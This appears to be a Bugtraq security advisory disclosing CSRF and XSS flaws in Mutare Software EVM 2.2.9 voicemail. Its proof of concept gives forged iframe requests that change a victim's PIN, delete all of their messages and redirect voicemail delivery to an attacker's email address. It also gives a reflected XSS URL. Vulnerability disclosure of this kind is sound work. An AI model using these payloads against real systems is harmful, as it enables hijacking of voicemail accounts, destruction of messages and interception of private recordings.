Mutare Software EVM - CSRF and XSS Vulnerabilities

From: Travis Lee <travisle@gmail.com>
To: bugtraq@securityfocus.com
Cc:
Subject: Mutare Software EVM - CSRF and XSS Vulnerabilities
Date:


Description:

Mutare Software EVM 2.2.9 (possibly earlier versions) is vulnerable to CSRF
and XSS.

An attacker could do the following to a users' EVM settings:

     A. Change their EVM PIN
    B. Delete all of their voice messages
      C. Change or add any of their delivery address for voicemails

CERT Vulnerability Note: http://www.kb.cert.org/vuls/id/136612


Proof of Concept:

CSRF:

  <html>
   <body>

      <h1>Mutare Software EVM CSRF PoC</h2>

     <!--
  <iframe src="https://evoicemail.domain/ChangePin.asp?NewPIN=<insert
new pin here>&VerifyPIN=<insert same new pin here>&ChangePIN=*" border="0"
height="300" width="400">
   -->

      <!--
  <iframe
src="https://evoicemail.domain/deletemsg.asp?SysID=4&PIN=&MsgDT=10/8/2010%20
9:26:00%20AM&CCM=ALL&Mailbox=<insert mailbox number here>" border="0"
height="300" width="400">
   -->

      <!--
  <iframe
src="https://evoicemail.domain/evmoctel.asp?PwdChanged=&Password=&AllowN=T&N
otifyEveryMsg=-1&Address1=<insert email address
here>&Address2=&Address3=&AllowD=T&IncludeVoice=ALL&AddressD=<insert email
address
here>&ActiveD1=*&AddressD2=&AddressD3=&AttachmentFormat=MP3&DeliveryType=0&L
astDelivery=10%2F8%2F2010+9%3A26%3A01+AM&LastDeliveryDB=10%2F8%2F2010+9%3A26
%3A01+AM&AllowF=F&PopF=T&AddressF=&Update=True" border="0" height="300"
width="600">
   -->

      </body>
  </html>

XSS:


https://evoicemail.domain.com/default.asp?Subscriber=12345%22%20onclick=%22j
avascript:alert%281%29;







Copyright © 1995-2018 LinuxRocket.net. All rights reserved.